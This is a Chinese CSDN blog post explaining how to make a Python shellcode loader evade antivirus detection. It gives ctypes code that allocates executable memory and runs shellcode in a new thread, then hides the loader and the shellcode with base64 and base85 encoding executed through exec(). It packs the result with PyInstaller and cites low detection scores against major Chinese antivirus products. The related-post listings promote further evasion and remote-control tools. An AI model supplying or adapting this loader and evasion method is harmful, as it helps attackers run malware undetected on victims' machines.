python 加密_python字符加密免杀

最新推荐文章于 2023-11-02 10:11:39 发布
最新推荐文章于 2023-11-02 10:11:39 发布
阅读量344 收藏 4
点赞数 3
文章标签: python 加密 python加密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39564755/article/details/111293375
版权

目前传统的或网上以公开的免杀方式几乎都不免杀了(见光死),所以本次免杀方式也只是分享一下思路,如果后面不免杀了再改改就可以了

  • 这里使用的是python加载shellcode,原始的shellcode加载源码如下:
import ctypes

shellcode=b"这里是生成的shellcode"
#设置函数VirtualAlloc的返回类型为c_int64
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int64
 
wiseZERld = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
 
#将shellcode移动到申请的内存,起始地址为c_int64类型
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int64(wiseZERld),shellcode,ctypes.c_int(len(shellcode)))
 
#创建线程并执行
CVXWRcjqxL = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int64(wiseZERld),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(CVXWRcjqxL),ctypes.c_int(-1))

如果裸用以上的方式会被各种杀毒软件秒杀

免杀

那该如何绕过杀软不被检测到呢,现在几乎所有的杀毒厂商都是基于特征查杀的,杀软会扫描程序的字符串同时与自己的病毒特征库进行匹配,如果程序中有某些恶意函数之类的字符串被匹配到,那么杀软就会认为此程序为恶意文件直接ban掉

知道杀软的检测规则就很好办了,那就那段报毒改那段字符就行了,但是那样又太累了,此时就得做字符串全加密了,至于加密类型看个人喜好了,想让字符串运行就得用到两个函数 eval,exec,这里我用exec进行免杀

  1. 首先将上述代码放在字符串中,然后进行base64加密处理再输出
import base64
x="""ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_int64
wiseZERld = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)),ctypes.c_int(0x3000),ctypes.c_int(0x40))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int64(wiseZERld),shellcode,ctypes.c_int(len(shellcode)))
CVXWRcjqxL = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int64(wiseZERld),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(CVXWRcjqxL),ctypes.c_int(-1))
"""
ex=base64.b85encode(base64.b64encode(x.encode('utf-8')))
print(ex)
  1. 然后复制输出的字符串,粘贴在下方解密处
import ctypes,base64

shellcode = b'这里是shellcode'
exec(base64.b64decode(base64.b85decode("Lu+J7Qb%ZUVO3;FQEO~&P*X~3WJqjx"+"T3AhWWHM}ZT0=>4No{y@Ol@>*V`)ipNo_T3Vnj`OOl(RpVns1_NoR0x"+"Q$+"WJqjxT3AhWSur^=VN*$RNo.......").decode()))
  • 看下免杀效果152d1a53c39a799949d627469d3fc192.png看到评分21分就有点难受,还有两个检测到了,但是过掉主流的360,火绒,腾讯等应该无压力
  1. 再改,把分降下来,刚才我们shellcode并没有加密处理,只是将加载shellcode的载体进行加密了,这次都加密了试试(这里采用b85格式加密)
import base64
shellcode=b"这里是生成的shellcode"

print(base64.b85decode(shellcode))
  1. 复制上面输出的密文,然后粘贴在shellcode处
import ctypes,base64

encode=b'{78f3@aV_@002QzK~PdrR!A|@Wk`!sU`UHn7)Xm!AV`aHP)HBAN=i*J$w)E4tUO_S0xTdw!O0Cl0m0(!Qb.....'
shellcode=bytearray(base64.b85decode(encode))
exec(base64.b64decode(base64.b85decode("Lu+J7Qb%ZUVO3;FQEO~&P*X~3WJqjx"+"T3AhWWHM}ZT0=>4No{y@Ol@>*V`)ipNo_T3Vnj`OOl(RpVns1_NoR0x"+"Q$+"WJqjxT3AhWSur^=VN*$RNo.......").decode()))
  1. 最后使用pyinstaller进行打包成exe格式,安装命令:pip insatll pyinstaller
  2. 微步云沙箱查杀率f692406f89273fd5ffc73e061005b317.png这次就比上次好多了,只剩10分了,免杀国内主流杀毒软件不是问题
  • 经过测试 py文件内容不管是什么只要是用pyinstaller打包的程序在vt上最低为6/71(看来python的打包程序已经逐渐被拉入特征库了,不知道pyinstaller的作者该怎么想?)
weixin_39564755
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用Python进行防病毒免杀解析
09-18
主要介绍了使用Python进行防病毒免杀,本文给大家介绍的非常详细,具有一定的参考借鉴价值,需要的朋友可以参考下
Python免杀
weixin_43526443的博客
08-03 2244
Somethingu have to know: 本Python脚本构建简易的http请求及响应,可通过服务端调用客户端CMD执行命令(可在客户端内置便捷指令 )。 同时,脚本使用了PyInstaller,将python解释器及第三方模块进行打包成可执行文件。 经测试可免杀绝大多数杀软。 0x01 环境准备 pip install requests(用于发送请求) pip install pyscreenshot...
python免杀
weixin_43152809的博客
07-13 688
最近学习的过程中,发现python的匿名函数很适合用于免杀python中,除了一般使用def定义的函数外,还有一种使用lambda定义的匿名函数。这种函数可以用在任何普通函数可以使用的地方,但在定义时被严格限定为单一表达式。从语义上讲,它只是普通函数的语法糖。 我的理解,匿名函数就是另外一个函数的隐含调用 下方func处无论是什么内容,都会返回system这个字符串 如果把执行内容换成whoami 如下方代码段所示: 运行就可以获取whoami信息...
Python shellcode免杀
qq_25761407的博客
04-02 5428
Python shellcode免杀
免杀学习(二)python
m0_62207170的博客
01-09 531
python免杀
python 异或加密字符串的实例
09-20
今天小编就为大家分享一篇python 异或加密字符串的实例,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
python实现字符加密成纯数字
02-18
本文实例为大家分享了python实现字符加密成纯数字的具体代码,供大家参考,具体内容如下 说明: 该加密算法仅仅是做一个简单的加密,安全性就不谈了,哈哈. 算法流程:
python实现字符加密 生成唯一固定长度字符
09-19
主要为大家详细介绍了python实现字符加密,生成唯一固定长度字符串,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
Python实现对字符串的加密解密方法示例
09-21
主要介绍了Python实现对字符串的加密解密方法,结合实例形式分析了Python使用PyCrypto模块进行DES加密解密的相关操作技巧,需要的朋友可以参考下
基础算法-python字符加密五种方法
最新发布
11-03
【基础算法】-python字符加密五种方法 # 1. url编码 from urllib.parse import quote, unquote name = "王大锤" # 编码 utf8_name = quote(name) # utf-8 print(utf8_name) # %E7%8E%8B%E5%A4%A7%E9%94%A4 长度...
python制作免杀软件教程及工具.zip
07-26
本资源会教你如何用python制作免杀软件,并提供了所需的代码工具和脚本,亲测能够过360安全卫士和火绒。
2020.04-远控免杀从入门到实践(5)-代码篇-Python1
08-03
2020.04-远控免杀从入门到实践(5)-代码篇-Python1
python免杀学习
m0_58595840的博客
01-06 436
python免杀bypass学习
python免杀技术---复现+改进----1
qq_41683305的博客
05-22 1324
0x01 复现 复现文章:https://mp.weixin.qq.com/s?__biz=MzI3MzUwMTQwNg==&mid=2247484733&idx=2&sn=5b8f439c2998ce089eb44541d2da7a15&chksm=eb231%E2%80%A6 首先用cobaltstruke生成一个python的payload脚本 然后复制里面的payload进行Base64编码:加密地址为:http://tool.chinaz.com/tools/ba
python免杀基础——三步(查杀、连接、代码)情况
渗透测试
11-14 1789
这次有所不同的是,使用了接收命令行参数,当命令行参数>1时才会启动程序,这样做的目的是减少云沙箱虚拟运行的风险(我个人认为)以上是使用windowAPI进行加载shellcode,先声明,在申请内存,给权限,创建线程。调用WindowAPI、采用shellcode无落地、代码无落地、远程加载、恶意代码加密;本次使用msf生成的shellcode。本次使用msf生成的shellcode。连接和上次一样,秒连。
Python免杀技术详解
weixin_68789096的博客
11-02 1000
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
【红蓝对抗】Python免杀入门学习
Fighter安全
04-23 1554
这里主要针对国内主流三大杀软进行免杀测试,python语法简单,开发效率高,适合入门学习,而且免杀效果也还不错。当然免杀是具有时效性的,文章的方法主要记录一下免杀思路。python环境:python2.7.18(x64)、python3.11.1(x64)windows环境:windows10、windows11杀毒软件:360杀毒(全引擎) + 火绒 + Windows Defender。
Python写黑客小工具,360免杀
weixin_34235135的博客
12-31 569
构思: client:反向连接server,执行shell命令 server:发送命令,控制客户端 import subprocess import socket import threading target="172.22.40.41" port=55555 buffer="" def sendMag(c_socket): gl...
cs免杀-使用python进行免杀
m0_53087192的博客
02-08 1871
环境 使用python版本为python3.6 32位版本,64位版本测试会报错。 安装pyinstaller,pywin32 pip3 install pyinstaller pip3 install pywin32 生成shellcode 使用cobalsstrike生成c语言shellcode。 使用shellcode loader加载shellcode #!/usr/bin/python3 import ctypes #shellcode 放这个位置 c = b"\xfc\xe8\x89\x
Python用凯撒密码加密Python字符
10-13
Python中,可以使用字符串模块中的ascii_lowercase和ascii_uppercase来获取小写和大写的英文字母,然后通过建立循环字母表来实现加密和解密。下面是一个示例代码: ``` import string def caesar_cipher_encrypt...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值